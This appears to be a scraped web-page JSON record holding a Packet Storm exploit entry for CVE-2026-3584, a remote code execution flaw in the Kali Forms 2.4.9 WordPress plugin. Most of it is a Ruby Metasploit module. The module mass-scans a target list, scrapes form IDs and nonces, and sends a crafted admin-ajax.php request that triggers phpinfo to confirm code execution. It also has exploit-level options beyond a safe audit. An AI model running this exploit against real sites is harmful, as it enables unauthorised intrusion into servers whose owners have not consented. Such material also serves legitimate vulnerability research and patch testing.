{“lastseen”:”2026-04-20T15:56:05″,”description”:”WordPress Kali Forms plugin version 2.4.9 suffers from a remote code execution vulnerability…”,”published”:”2026-04-20T00:00:00″,”modified”:”2026-04-20T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 WordPress Kali Forms 2.4.9 Remote Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:219170″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-3584″],”sourceData”:”==================================================================================================================================\\n | # Title : WordPress Kali Forms 2.4.9 Remote Code Execution Assessment |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.4 (64 bits) |\\n | # Vendor : https:\/\/fr.wordpress.org\/plugins\/kali-forms\/ |\\n ==================================================================================================================================\\n \\n [+] Summary : This Metasploit auxiliary module is designed for security auditing of WordPress sites using the Kali Forms plugin, focusing on detecting potential exposure to a Remote Code Execution (RCE) condition.\\n \\n [+] POC : \\n \\n ##\\n # This module requires Metasploit: https:\/\/metasploit.com\/download\\n ##\\n \\n require ‘set’\\n require ‘json’\\n require ‘uri’\\n require ‘fileutils’\\n require ‘thread’\\n \\n class MetasploitModule \\u003c Msf::Auxiliary\\n include Msf::Exploit::Remote::HttpClient\\n include Msf::Auxiliary::Scanner\\n include Msf::Auxiliary::Report\\n \\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘WordPress Kali Forms – ‘,\\n ‘Description’ =\\u003e %q{\\n version with MSF compatibility improvements:\\n },\\n ‘Author’ =\\u003e [‘indoushka’],\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘References’ =\\u003e [\\n [Msf::Reference::CVE, ‘2026-3584’]\\n ]\\n )\\n )\\n \\n register_options([\\n OptInt.new(‘THREADS’, [true, ‘Concurrent targets’, 10]),\\n OptPath.new(‘TARGETS_FILE’, [true, ‘List of target hosts’]),\\n OptInt.new(‘TIMEOUT’, [true, ‘HTTP timeout’, 15]),\\n OptString.new(‘EXPLOIT_LEVEL’, [true, ‘SAFE_AUDIT \/ RCE_ONLY \/ FULL’, ‘SAFE_AUDIT’])\\n ])\\n end\\n \\n def setup\\n @lock = Mutex.new\\n @stats = { scanned: 0, vulnerable: 0, failed: 0 }\\n \\n @loot_dir = File.join(Msf::Config.loot_directory, \\”kali_forms_#{Time.now.to_i}\\”)\\n FileUtils.mkdir_p(@loot_dir)\\n end\\n \\n def normalize_target_url(target, path = nil)\\n return nil if target.nil?\\n \\n base = target =~ \/^https?:\\\\\/\\\\\/\/ ? target : \\”http:\/\/#{target}\\”\\n base = base.chomp(‘\/’)\\n \\n return base if path.nil?\\n \\”#{base}\/#{path.sub(\/^\\\\\/\/, ”)}\\”\\n end\\n \\n def update_stats(key)\\n @lock.synchronize { @stats[key] += 1 }\\n end\\n \\n def run\\n targets = File.readlines(datastore[‘TARGETS_FILE’])\\n .map(\\u0026:strip)\\n .reject { |l| l.empty? || l.start_with?(‘#’) }\\n \\n queue = Queue.new\\n targets.each { |t| queue \\u003c\\u003c t }\\n \\n print_status(\\”Starting scan on #{targets.length} targets\\”)\\n \\n datastore[‘THREADS’].times.map do\\n framework.threads.spawn(\\”kali-scanner\\”, false) do\\n loop do\\n begin\\n target = queue.pop(true)\\n rescue ThreadError\\n break\\n end\\n \\n scan_target(target)\\n end\\n end\\n end.each(\\u0026:join)\\n \\n print_status(\\”Done. Scanned=#{@stats[:scanned]} Vulnerable=#{@stats[:vulnerable]}\\”)\\n end\\n \\n def scan_target(target)\\n update_stats(:scanned)\\n \\n base = normalize_target_url(target)\\n return unless base\\n \\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_target_url(base, ‘\/’),\\n ‘timeout’ =\\u003e datastore[‘TIMEOUT’]\\n )\\n \\n unless res\\u0026.code == 200\\n update_stats(:failed)\\n return\\n end\\n \\n if res.body =~ \/kaliforms|KaliFormsObject\/i\\n print_good(\\”[+] Potential target: #{target}\\”)\\n \\n if datastore[‘EXPLOIT_LEVEL’] == ‘SAFE_AUDIT’\\n return\\n end\\n \\n form_ids = res.body.scan(\/data-id=[\\”‘](\\\\d+)[\\”‘]\/i).flatten.uniq\\n nonce = res.body[\/ajax_nonce[\\”‘]\\\\s*:\\\\s*[\\”‘]([a-f0-9]+)[\\”‘]\/i, 1]\\n \\n return if form_ids.empty? || nonce.nil?\\n \\n form_ids.each do |fid|\\n if test_rce(base, fid, nonce)\\n update_stats(:vulnerable)\\n print_good(\\”[!!!] Vulnerable: #{target} FormID=#{fid}\\”)\\n \\n report_vuln(\\n host: URI.parse(base).host,\\n name: ‘Kali Forms RCE’,\\n refs: [Msf::Reference.new(‘CVE’, ‘2026-3584’)],\\n info: \\”Form ID #{fid}\\”\\n )\\n end\\n end\\n end\\n rescue =\\u003e e\\n update_stats(:failed)\\n vprint_error(\\”#{target} =\\u003e #{e.message}\\”)\\n end\\n \\n def test_rce(base, fid, nonce)\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_target_url(base, ‘\/wp-admin\/admin-ajax.php’),\\n ‘vars_post’ =\\u003e {\\n ‘action’ =\\u003e ‘kaliforms_form_process’,\\n ‘data[formId]’ =\\u003e fid,\\n ‘data[nonce]’ =\\u003e nonce,\\n ‘data[thisPermalink]’ =\\u003e ‘phpinfo’\\n },\\n ‘timeout’ =\\u003e datastore[‘TIMEOUT’]\\n )\\n \\n res\\u0026.body\\u0026.include?(‘PHP Version’)\\n rescue\\n false\\n end\\n end\\n \\n \\n \\t\\n Greetings to :==============================================================================\\n jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\\n ============================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/219170″,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/219170\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-04-20T15:56:05″,”description”:”WordPress Kali Forms plugin version 2.4.9 suffers from a remote code execution vulnerability…”,”published”:”2026-04-20T00:00:00″,”modified”:”2026-04-20T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 WordPress Kali Forms 2.4.9 Remote Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:219170″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-3584″],”sourceData”:”==================================================================================================================================\\n | # Title : WordPress…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-48061","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n